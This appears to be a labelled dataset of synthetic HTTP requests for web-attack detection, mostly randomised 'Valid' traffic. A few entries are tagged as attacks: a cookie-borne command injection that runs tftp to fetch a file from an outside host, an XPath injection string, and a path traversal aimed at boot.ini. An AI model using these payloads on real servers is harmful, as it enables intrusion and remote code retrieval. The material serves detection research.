Authorization: Digest algorithm=MD5
Range: 7780-1621,55-
Referer: /Dtmcbhit/l8btlrta/t8iK2f/dw9wum.php3
TE: chunked;q=0.5,chunked;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: eenwitnni
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4217x4135
Via: 0.1 www.pdz0l.js, FTP/7.9 www.6old.tiff:5, 6.8 74.124.83.220
Transfer-Encoding: identity
Upgrade: cwnm/1.8, Pcnvc/2.3, tr9/5.6, ra7/0.0, seaag/7.9
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 233.105.54.63
X-Serial-Number: 59787959
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6Wdmail=dge0obin&ebuntnTioadi=7132&s8srndOm=4&e3zuErudhraco=49&jbege=dn2e3ieamxTUeot&rhruptyl=2&e8lidno1dcR=suu1ttp&8uw=886807

End - Id: 32770
Start - Id: 31313
class: Valid
GET /wsock_streamywyI7.dll? HTTP/1.1
Host: 222.236.32.127
Connection: eschgt
Accept: */*
Accept-Charset: iso-2022-jp, iso-10646-ucs-2;q=0.1, euc-cn, us-ascii
Accept-Encoding: *
Accept-Language: la-owq;q=0.0, mONeuRs-8tierab;q=0.8
Cache-Control: only-if-cached
Client-ip: 115.41.215.171
Cookie: cmdHjB-fo=yt? ;rSs=168029;puuu=4
Cookie2: $Version="7"
Date: Sat, 12 Apr 08 19:42:59 CET
ETag: W/"CBA8E6CDeaAE0rORVlA"
Expect: 9latsnht
From: Allouc@sein.uk
If-Modified-Since: Sat, 17 Jan 04 11:22:31 CET
If-Unmodified-Since: Tue, 14 Jun 05 22:10:16 CET
If-Match: *
If-None-Match: *
If-Range: "0D4XadllQWvv.ZcAAds"
Max-Forwards: 364
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rnibihas"
Authorization: NTLM cjRlM2h6aWFkaHBuQ2NlaG9zdGt3SHVhY2F0cHN0b3JlenM=
Range: -388719
Referer: /onnsqw/nenIt/3iydEr.html
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.8 (X11; U; Unix 6.5; sf-ti; rv:9.0.7) Gecko/90042889
UA-CPU: Sparc
UA-Disp: 1773,6929,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3795x126
Via: FTP/9.0 56.208.145.168
Transfer-Encoding: compress
Upgrade: dGeost/2.9, rda/6.8
Warning: 107 www.ohem.gif "gsElmnsdshO7" "Wed, 21 Mar 07 14:34:20 GMT"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 61504
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31313
Start - Id: 1130
class: Valid
GET /i0dxJ-Mm1/ftCrioogesanzFwyyiie/m35ebl2ts/4Ue_.IYvxRutmwChd/oPEV3yiQP/w5eaTerprOptt.cgi? HTTP/1.1
Host: 188.163.221.242
Connection: close
Accept: text/*;q=0.4, audio/x-wav
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, compress;q=0.4, gzip;q=0.8, compress;q=0.4
Accept-Language: a-v, sqR8zw-j, iw8otccn-nOfesteL;q=0.0, uozwe-oTi5dLE, rnt-uroxdt8t
Cache-Control: max-stale
Client-ip: 74.201.154.177
Cookie: teO=reueadjtib9LRt4et
Cookie2: $Version="1"
Date: Mon, 29 Mar 04 12:27:13 CET
ETag: W/"Tm_iSOCIcWZgo5eA"
Expect: nrsr
From: enh8bni@tkcs5kpkr.be
If-Modified-Since: Fri, 24 Sep 04 04:54:49 UTC
If-Unmodified-Since: Fri, 29 May 09 01:42:59 GMT
If-Match: *
If-None-Match: "pNMYY_rvG2wZv7y9ulkf"
If-Range: "6.GYDbxpuFsfB0G6Xv"
Max-Forwards: 34
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: 1roecw ynJns=ailepj5
Authorization: NTLM cmV0ZXBtYjd0Q0VkbWYwYm9jQ3hlb1RoY3RuYWU2N3dsOHRJYQ==
Range: 9-345,-0,-259
Referer: http://www.qdipru.ch/di90ce/chqd/qsleeelJ.gif
TE: trailers
Trailer: Referer
User-Agent: Mozilla/3.6 (Windows; U; WinNT 5.1; ss-cS; rv:9.6.3) Gecko/15186936
UA-CPU: PowerPC
UA-Disp: 111,7924,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2688x3357
Via: HTTP/2.4 108.98.41.43, FTP/8.5 245.18.127.14
Transfer-Encoding: identity
Upgrade: 3idlO/2.7, ars/1.3, heste/0.5, fwoe/6.6
Warning: 281 www.stcj.css:27 "ensgdtO8t" 
X-Forwarded-For: 174.219.186.109
X-Serial-Number: 704934
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 1130
Start - Id: 532
class: Valid
GET /gFaEqYFqtHota/o-BFuht4JHmHwFDOK1ud/ubaz/gu/e45palq0he1Ounant/eWX831KNrPyg-9hSf-ty/o8jq9Cz-8kApphw.jsp?yoZK=51933685&ee4oy=15964&ltiol=ah%26GDomi0N HTTP/1.0
Host: 201.162.87.171
Connection: close
Accept: image/*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.6, gzip
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 245.11.225.60
Cookie: wcceeswiheh=daakkhmd9nniet2;oe=dtooOqcmd=iZ;orewE=e'~l
Cookie2: $Version="7"
Date: Thu, 18 Dec 08 16:37:26 UTC
ETag: "hI2nbCPyH88OD7Ac"
Expect: 100-continue
From: Tkar@ty3hCoans.biz
If-Modified-Since: Wed, 24 Jun 09 13:15:34 GMT
If-Unmodified-Since: Thu, 29 Apr 10 05:59:21 GMT
If-Match: "l.EGNDX1sgEEOd."
If-None-Match: "YGKUJTDhI0IhWRpr@"
If-Range: *
Max-Forwards: 4412
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: A4eeew eo6dcn3=Otpaof
Authorization: Digest nc=4aabfdF2
Range: 5893-9457,819085-8
Referer: http://rfnai.st/orDama/xa0uuoi3/swtrte/rluso.zip
TE: deflate,deflate
Trailer: Warning
User-Agent: ybdsanwd (tmuWZhgujW)
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 425x931
Via: n8hr/0.9 166.121.160.229, 5.5 211.18.137.237:86
Transfer-Encoding: Cv2djo
Upgrade: iEaOeu/0.3, n1ooih/5.9, nlStt/9.5
Warning: 031 173.215.193.129 "koSnmyiqOdiUot" "Fri, 03 Apr 09 01:48:11 UTC"
X-Forwarded-For: 1.240.169.3
X-Serial-Number: 35520
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 532
Start - Id: 10670
class: Valid
GET /0cahoEQq7PmgD.hi85TS/reeiqfwh/pHJ1.UwG6wB0b.W/h5GZTYb96NEzG/hRIyYuE9b0ayRmJNI/oittwr/ijDv87AvyPKHvP/dqk.ousCRC/e7sulmodp/sb2.cfm? HTTP/1.1
Host: www.sirasmalee.com:80
Connection: keep-alive
Accept: image/*;q=0.2, audio/x-wav;q=0.8, image/*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.0
Cache-Control: max-stale=693
Client-ip: 245.69.51.123
Cookie: rtga1tyiecnjsng=31276;7xveajnn=trrR;ve1acoigiehFi9=tesfoh]naurnr;irttnto=d0Tatg;sr=e8eceqeec]e)m
Cookie2: $Version="92"
Date: Wed, 23 May 07 08:47:58 CET
ETag: "4HW@456wgHvT5yjvX96"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Wed, 15 Aug 07 23:40:30 CET
If-Unmodified-Since: Wed, 14 Jul 04 23:23:28 GMT
If-Match: "gzgzGbt1JE-HndMDT"
If-None-Match: "BwfILPO5bSU.bU80cK"
If-Range: *
Max-Forwards: 36
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic WXRlb2VoaTp3aGk3bnM=
Authorization: Basic b24yaG90czphcnlqNGdObg==
Range: 9268-2780
Referer: /eq4ndhi/dcENA8o.wav
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.8 (X11; U; Unix 0.2; he-en; rv:2.0.8) Gecko/39322469
UA-CPU: 68000
UA-Disp: 2636,1101,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6678x842
Via: 4.6 www.nqmm.png, ca9ys/8.6 www.xwee6rsm.js, 8.1 www.dsisy.htm
Transfer-Encoding: deflate
Upgrade: 7wR38/2.1, n4l/0.4
Warning: 628 www.adro.shtml:8 "wytptersn" 
X-Forwarded-For: 168.27.206.6
X-Serial-Number: 45651300212096623
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10670
Start - Id: 36849
class: OsCommanding
POST /e2HeMy27WOg27Z/teD3wm_uWxXMjEtDB/o6lnAisjteBsnon0ohei/enftmmnOEsHo/QU/eTPl-oqUyg/rpoIRBQWxv3SjYIPgd/re0eutss6/dOze8ashhXhlaanhde.exe? HTTP/1.1
Content-Length: 204
Content-Language: nmkXU,snh
Content-Encoding: identity
Content-Location: http://www.nsuinh.fr/cmRad/ueeea.zip
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 14 Dec 08 07:56:49 UTC
Last-Modified: Mon, 26 Mar 07 15:49:37 GMT
Host: www.uawIep.net
Connection: pcrq
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Cookie: o2=lAsDK;tss=h3ioo;pincludeKro0H='    ;  tftp -c get    www.tenitostrane.com:/te.tar
Date: Mon, 15 Mar 04 03:03:07 GMT
If-Modified-Since: Sun, 16 Jul 06 24:26:59 GMT
If-Unmodified-Since: Fri, 18 Jul 08 08:01:23 CET
If-Match: *
If-None-Match: "XqlDr4gDU3fbpMm48"
Max-Forwards: 3192
Pragma: rwt='7aen'
Authorization: NTLM YTU3aEx0a2lwcmVhYW1oc2lJZW9jc3RydG9jc0VhaXduYW9xZWVhc3d2
Referer: /FAuhtehp/vTnhsnwc.tar.gz
Trailer: From
User-Agent: bexutLgt (2lXp7QERM; yF8--zF; h3c80-6A; wWNmnTIpo)
Via: 9.8 www.eczvi.js:3885, 0.9 113.52.204.23, 9.7 www.t3aee.shtml
----: ----------------------------------

plh=likeT ccoeEehtaccesgfscripttadminhq&tth8lBmeia=rUnwindow.opendeufl&onx3ujn0trdrE=4eitbznteeFxnnDio3&hl=eNeub&where-sF9ietcK36Kb=uqfNu&iarntdtufe6atjo=6993399278&ohSnAhErui=lZg6&ILTIr7=jY2&cneoa=275961

End - Id: 36849
Start - Id: 30019
class: Valid
GET /Rdw_httpsHBzKzqVenx.htm?YOKr9TwfgBOK=a%28%28eyA&xnyr1gs5=01169&eMg=8qacsternoo%3Caan&wnca4no8=41&YscriptmNEZ=6e&nl5ae0nhe=urrb6&0di=tetpiLrbh&ci=a.s41G&gxooC72SgyRz=eCp&hmhdtt=syBjxT4&dme=y+boot.iniBtaS%40 HTTP/1.1
Host: www.l6srt.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nddtT-o, talLr-cal, 3h-v, cewx-nmHaS;q=0.3, mqp-3d
Cache-Control: no-store
Client-ip: 217.150.9.1
Cookie: een=s6R;Oeadgi=4634646;etEnvcoa=echosa-nok;z1t=3;rrQt2=7437073;ldrDozi7Eatert=34
Cookie2: $Version="72"
Date: Fri, 16 Oct 09 02:38:50 GMT
ETag: W/"BvopIOj24Q2Ts1ddJqx"
Expect: 100-continue
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Thu, 11 Mar 04 22:06:42 CET
If-Unmodified-Since: Mon, 03 Apr 06 24:51:33 GMT
If-Match: "2hJQ221nByWWzfgRIq."
If-None-Match: *
If-Range: Thu, 11 Oct 07 21:24:13 GMT
Max-Forwards: 310
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: yitanN eiz5i=odeihx
Authorization: Digest response="3E681Ef6c50468ba738d0ba4eb5c9Cdb"
Range: 873888-,-667435,809054-93
Referer: /jTzne/hanoe/tarshic3.php4
TE: gzip,gzip;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.8 (Machintosh; U; PPC 1.6; ou-es; rv:1.9.6) Gecko/98562572
UA-CPU: StrongARM
UA-Disp: 6424,6665,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5873x4551
Via: aIl3/8.3 42.194.199.35, FTP/8.1 www.yhtNmunt.js:8875, 0.8 6.92.170.174
Transfer-Encoding: identity
Upgrade: xo1itu/7.4, olnwaa/6.2
Warning: 840 www.fmip.htm:1 "ZCdsohe" 
X-Forwarded-For: 23.247.167.67
X-Serial-Number: 2857393
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30019
Start - Id: 28550
class: Valid
GET /itotruTtIos/DITZtXfeN@.1vE0/duauk5ietnre/nmAE1V014/ty1mE/tHYVQ1eaRpby1Xg0/@.IpDW-FZVYJ0G/gboot.inifromIi_wt/u5/KehrrM6l.tiff?Cuye=aF07aymsmyoaiywER&xbsetanEfoo2hkL=sfbn%7E%5Czi%40j&67dusmsce9ixtn=ilIdikdA8nwlum&ldfleeS3neao=m7%405%5D&rmid4eHapesCem=352&tggpaeissn=a6o9te9eo&logESnetcath=4592243 HTTP/1.0
Host: www.trkkia.biz:06059
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: txt-sa, a5-tn;q=0.1, 0ydad-e;q=0.8
Cache-Control: no-transform
Client-ip: 81.119.248.8
Cookie: bz=hb3aVsUJ;NrejkdE=Cne-b
Cookie2: $Version="101"
Date: Tue, 10 Jun 08 07:48:43 GMT
ETag: W/"J0JBa4INOpOLVXAht"
Expect: wauu9u
From: ekkeeGea@9uAbioy.it
If-Modified-Since: Mon, 13 Sep 04 23:10:49 UTC
If-Unmodified-Since: Sat, 27 Nov 04 19:53:18 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 25 Sep 04 02:35:08 CET
Max-Forwards: 133
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest username="5oto"
Authorization: Digest username="wgIyroa"
Range: -485791
Referer: /eaLxsoe/nhihEaao/Uvew/zienaiat/sf9pg.css
TE: chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.7 (X11; U; Unix 4.3; sa-he; rv:9.8.2) Gecko/03474091
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6545x8948
Via: 6.3 www.itJie.tiff, FTP/8.5 252.117.153.59, elo/9.7 5.128.41.173
Transfer-Encoding: 5ints
Upgrade: lpo3mi/8.1, yla/6.6, eiam4/2.9
Warning: 943 www.0eTkm.jpeg "vada" "Wed, 23 Jun 04 24:08:28 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28550
Start - Id: 24235
class: Valid
GET /cw4jx7KXd/e06seensezlvu/oteld4eetsuB/dw9h8@ttXlOIKwspg/rsraakyC5tveSMYsrcl/aQWQY1aWvdK-.pl?4tiHyaa=inDR8irpMghpeyhb&jheqa=53398948&a0ahbrqexAhxij=eFhbfn%2F&su=sdpYeE-U&kitpetrepidgrrh=4&eno=bhTiyfuodRq&hs9isneznek=eKcx&snoAN1r=ec6r3bDll4snr HTTP/1.1
Host: 33.29.49.181:80
Connection: NytpHnmw
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: gnee-jsis;q=0.3, sIneyi-bil, 5inuth-l0sbsn, tboweela-hf;q=0.5, 5hQs-m7n;q=0.3
Cache-Control: max-stale=5931
Client-ip: 38.8.118.31
Cookie: Pg2OoRwp-R-hR=qN8n-NN7r;0replaceto=u2SGfOjbmE
Cookie2: $Version="00"
Date: Thu, 23 Feb 06 19:32:43 UTC
ETag: "NHJ3YxasJvE_17Om6p"
Expect: 100-continue
From: s0hwns@eIpjfyve7i.ch
If-Modified-Since: Sun, 21 Jun 09 06:54:59 GMT
If-Unmodified-Since: Tue, 05 Apr 05 17:29:27 GMT
If-Match: "V-Qecc.MCICW9IQR2C"
If-None-Match: "rfAXToXKffR1YhqJ2An"
If-Range: Mon, 03 Jul 06 02:51:47 GMT
Max-Forwards: 00
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: mokdd bhteKe=rneer
Range: 532553-52,728-36
Referer: http://soNiaa.org/tDvsurt/eIar5i/mrynum/loElriD/aeaie.tiff
TE: trailers
Trailer: If-None-Match
User-Agent: wdCrisde60roo
UA-CPU: Sparc
UA-Disp: 565,7828,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 982x566
Via: 9.7 www.i2qli.jpeg:05080
Transfer-Encoding: identity
Upgrade: nmsBw/3.6
Warning: 335 157.183.177.154 "buOrqedamsso" "Thu, 14 Apr 05 06:20:30 GMT"
X-Forwarded-For: 190.104.194.11
X-Serial-Number: 58849092
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24235
Start - Id: 11364
class: Valid
GET /ujRi70WUUW0U3p3WAk/e2ig.jpeg? HTTP/1.0
Host: 219.202.0.144
Connection: w7ineNa7
Accept: image/*;q=0.3
Accept-Charset: x-mac-arabic;q=0.9, x-mac-arabic
Accept-Encoding: *
Accept-Language: eedCT19-irl;q=0.1, h0-Aa
Cache-Control: no-cache
Client-ip: 218.1.121.67
Cookie: i9Uate2ta79l7=6;Pmqvi=aeg5us;idsster8on1dlr=37290;hg0do50a_NNSKA=4808002619;yQvyMevscript3ANhtpass=uobellbnfDamohstne
Cookie2: $Version="6"
Date: Mon, 17 Oct 05 06:27:12 UTC
ETag: "AL1P3Im9xyb_Ng.B"
Expect: 100-continue
From: tXstmn@rlemsJto.cz
If-Modified-Since: Sun, 09 Nov 08 24:05:53 CET
If-Unmodified-Since: Sun, 24 May 09 01:34:21 CET
If-Match: *
If-None-Match: "3q.rYOOFtMCC7MHSCAw"
If-Range: Mon, 03 May 04 07:55:48 UTC
Max-Forwards: 7
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXNhdHQ1ZWxmczExdFJ0Y2hpdnFBMmNkUHJyWWdpVkVlc2FpdWV0bmVzbg==
Authorization: TrLYl sn3pa=tewe
Range: -97,143727-
Referer: http://07emNnq.fr/8jeSr/eeytt/wonr.txt
TE: chunked;q=0.5,trailers
Trailer: Max-Forwards
User-Agent: ensr (sVASjpR; eRPnG1J; or6OG-uRjR)
UA-CPU: StrongARM
UA-Disp: 400,6938,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6133x6762
Via: FTP/9.4 www.odrci.jpg, FTP/2.4 11.94.55.49
Transfer-Encoding: identity
Upgrade: 07rd3w/0.6, sawral/4.2, iioa/6.4, luE/7.0, isdes/2.0
Warning: 883 www.eeiyiwe.jpeg "akusdr" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 0505318
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11364
Start - Id: 21582
class: Valid
GET /qClh/jXSRanIEaY@1m/sAwn73xdaViab8eZyWZ/u50lc/prPkwiO3EK/jnldsmaewn/mL.yq/cD53ZUXK.9fcf/cAEdHOYrVXrvNA@o/rocr.htm?Iottetltc7e=6235237&NchKURdgC=-nocn%29n%29samusees&f5Rz_I8sXMg=adocumenta&sestyleAEgz=%2Fzz6o&oenutHk=srfon4&eoouvioeazthc=y8a&iathyr6Aa=70194&gaulherjgrOsce=099&2GIrepl8sTymz=sedCsso%7Eo%5D+%3Cia&me0ettNaKn=69&tS8l0mtitad=p1sock_stream&ydalwytsisShi43=P%26&hSnbEoesnyjgfob=utnzt HTTP/1.0
Host: 146.156.212.226:09
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: x-mac-arabic;q=0.3, x-mac-chinesesimp, x-mac-japanese;q=0.1, windows-1254
Accept-Encoding: 
Accept-Language: ergnhn-o9eed
Cache-Control: no-transform
Client-ip: 200.137.77.135
Cookie: txtehtiiheNeh=bmas;l3wsienr=aseT ;n2bt6ecS6emj=e6uljsctal1c;UGlJR0Fy=passwd0;tot5h9c=743
Cookie2: $Version="58"
Date: Sun, 12 Feb 06 12:09:26 GMT
ETag: "svxZiDTNS-aJ2Pv@"
Expect: eIxaen4e=2auh;bWPne7g
From: edogs@6Ro1enit.gov
If-Modified-Since: Sat, 30 Aug 08 02:11:56 GMT
If-Unmodified-Since: Sat, 05 Jan 08 07:20:43 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 21 Mar 06 04:51:11 CET
Max-Forwards: 85
MIME-Version: 7.7
Pragma: l='saiO'
Proxy-Authorization: Digest nc=69Fc9563
Authorization: Basic b3RyYWU6YW5pNGhs
Range: -2,-697987
Referer: http://www.uape.biz/oasA5ha/tond/4itt/o6aNfah6.jpg
TE: trailers,deflate,trailers
Trailer: If-Range
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 8.9; wp-aa; rv:2.9.6) Gecko/64949492
UA-CPU: x86
UA-Disp: 878,5357,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0542x2765
Via: FTP/5.2 www.u5endtoo.htm:84407, 2.3 www.w1sOre.html
Transfer-Encoding: compress
Upgrade: rle/0.9, 32noar/1.9, terase/3.6, lop/4.7, lgd/8.7
Warning: 906 www.0bBaahO.html "iyyOei" "Thu, 02 Feb 06 10:40:07 UTC"
X-Forwarded-For: 125.112.206.65
X-Serial-Number: 42015
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21582
Start - Id: 35679
class: XPathInjection
GET /eX40zFTSRKQ9Td/d66wTYVER2D2wOjL1o/ees2htTT4/_KExy5L07hs7R_/lSOaN0UyU./nkZd9eA.m7kwF@xjS01x/t9ps-LbpR.sh?gr=1zas%2BhIimn8&tpGt=7980&rwxep=144&aeopus=wmmw&ynuDsEbrul0w=oeoscTc%27+++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or++%27lsd%27++++%3D++++%27&E.scriptvarKJ=su-&gb=etv0djouhkyr&ucie4ex5as=1et HTTP/1.0
Host: www.2EIifs.uk:09080
Connection: keep-alive
Accept: image/jpeg;q=0.4, text/*, text/html;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: g0da-nn;q=0.1, e7-uh7aol;q=0.9, t8y1ts5-odno;q=0.2, rt6rfNo-aixt;q=0.8
Cache-Control: max-age=938
Client-ip: 68.97.141.43
Cookie: srirAeae=i~ntee0h;lZ30u=xmt ipmo=eer;cz7_8opt2Z_1=643355;T636F=8969
Cookie2: $Version="063"
Date: Mon, 19 Jun 06 21:58:28 CET
ETag: "7hIxyEEn8iRctKw2"
Expect: 100-continue
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 05 Feb 04 20:17:16 UTC
If-Unmodified-Since: Thu, 30 Sep 04 09:19:58 GMT
If-Match: "6Zc0t_nb7p0vZsKvoUtM"
If-None-Match: *
If-Range: Thu, 31 Aug 06 22:10:10 CET
Max-Forwards: 780
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest username="tghlh"
Authorization: NTLM aHRlZ2VLaGFyd2F3ZHNyaWVjZXJvc050NXRmbXRodXZFcExueGJld3lrbnJlc24=
Range: -5103
Referer: /uhNeN.pl
TE: trailers,gzip;q=0.2,deflate;q=0.7
Trailer: From
User-Agent: TWnov/7.4.4.6.8
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: 7.0 36.212.132.246
Transfer-Encoding: compress
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 785 www.etlLs.css:3 "mryaear9up1NyIone0" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35679
Start - Id: 20525
class: Valid
GET /eddrr/uxmhs/csnwfio5/ta7tnRuitnluTyulgyi/e2c6mNpgb64H.png?sTku2nnaas=eYoelear4is%40se&scsAeN7=133&sat=opens%40mtil6TO&pcyd3itm=090984 HTTP/1.0
Host: www.esc5.st
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: x-mac-hebrew;q=0.0, windows-1258;q=0.9, windows-1257;q=0.9, utf-8;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=394
Client-ip: 168.109.61.182
Cookie: EBdrRliriw6fab=aetycoDmno;vwiee=hrmar;ce8niusp=23312764;lEieidaate5oe3S=9r8-8qDNKVfx;8r=329889;ci1wemHrAdi=2610367930
Cookie2: $Version="88"
Date: Tue, 10 Oct 06 21:12:53 UTC
ETag: W/"H9HATn4wvtevWS-kYLzg"
Expect: t1la=2usu
From: ttui@snpa.it
If-Modified-Since: Tue, 23 Dec 08 10:58:24 UTC
If-Unmodified-Since: Tue, 19 Feb 08 07:45:45 UTC
If-Match: *
If-None-Match: "wvR-.P9JjagPzSfyMj"
If-Range: "B6Ek5C4S-oYamR1Zf"
Max-Forwards: 7730
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM bkVoSWFhbXRWcjlrZXlyaWVlbGdobG9lckl0ZW43ZTFzZWxlcjdmM2lob2l2ZXBP
Authorization: NTLM ZXB5MkRzN211Y1N0bWluVHNobXdhdGwwZTFoOGVjODFucm1xekhlRWhuM29BeXU=
Range: -6,89-60
Referer: /hdheOe/7fl2p/pisCntf/ughs/lue7mr.nsf
TE: trailers
Trailer: From
User-Agent: oadBrfuOehdheaa2
UA-CPU: StrongARM
UA-Disp: 650,0186,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5447x066
Via: ryed5o/0.6 128.155.43.246, FTP/6.2 www.nvtua.js
Transfer-Encoding: eyxuho
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 678 www.dRoc.jpeg "lAdokerhfgTnsaoGeu" 
X-Forwarded-For: 55.186.171.144
X-Serial-Number: 48113953855
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20525
Start - Id: 36131
class: PathTransversal
GET /v0flw4TRgBe/atslUos9laabre/IsamxpNwinnt0V5LXg/lh1/AFCLbfmIcat2aoza/JJbc8@S/homeBBj.M6PFy1JpBQ/QBAt5Q8sc/bs_ct3/Hg.jpeg?1@bRLm.dnullKetcI=sock_streamsftpta&3n=b%27s&sdelxsicz=2%3A%5Cwinnt%5Cboot.ini&gnr=716003 HTTP/1.1
Host: www.qfir.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: bte-e7eire;q=0.0, f-msr;q=0.6, e-sndwlsr, ut5tw-3mlgd9
Cache-Control: ohtbo='eeatOt'
Client-ip: 77.156.80.102
Cookie: roi=2650526;rrAeq7etoyo1=eCt1oyeIusurewh;aawsnpalgnov7=tfEh
Cookie2: $Version="2"
Date: Sun, 09 Oct 05 17:39:54 UTC
ETag: "lMBZg_LeLLpyz7x8YDp."
Expect: ieg5
From: regt5wfi@r275i.st
If-Modified-Since: Sat, 12 Aug 06 22:42:33 GMT
If-Unmodified-Since: Sat, 10 Oct 09 11:05:22 CET
If-Match: *
If-None-Match: *
If-Range: "LbSd6-.go-bZbqxMu"
Max-Forwards: 51
MIME-Version: 5.0
Pragma: oiR='nSrttsQc'
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: dv2sl edbc=qyempezk
Range: -535722,74763-864722,-62713
Referer: /lLutd/yowu3Nh/je1le/pgiinog.conf
TE: deflate;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: idueDeaaiatlmsiawbi
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7606x3250
Via: 6.9 www.Enamoke.html
Transfer-Encoding: compress
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36131
Start - Id: 551
class: Valid
GET /X@6dxKIlocationS/p8Gp1xy9n.4u2ActHpi/eqmrSc1Ai/vbscriptjC-WI-boot.iniGP.msf?rc2r=%5D&6seEgro=43812826 HTTP/1.0
Host: 122.14.235.233
Connection: soc26c
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress
Accept-Language: 4wlrntu-tept;q=0.8, th-ia;q=0.7, w-eeht, joedd-vreeo, e-anhn;q=0.1
Cache-Control: no-store
Client-ip: 251.178.170.205
Cookie: mt=5rajcUiteeat;5ilAeledab=2;khs=8176422;13c=tnnrUsjThmmo
Cookie2: $Version="80"
Date: Fri, 13 Jul 07 10:20:41 UTC
ETag: W/"z_PlEuMD@OYhaZFNhw"
Expect: 8mlnolre=hrua
From: pasea@rsg3kzoak.biz
If-Modified-Since: Sun, 18 Oct 09 15:03:38 CET
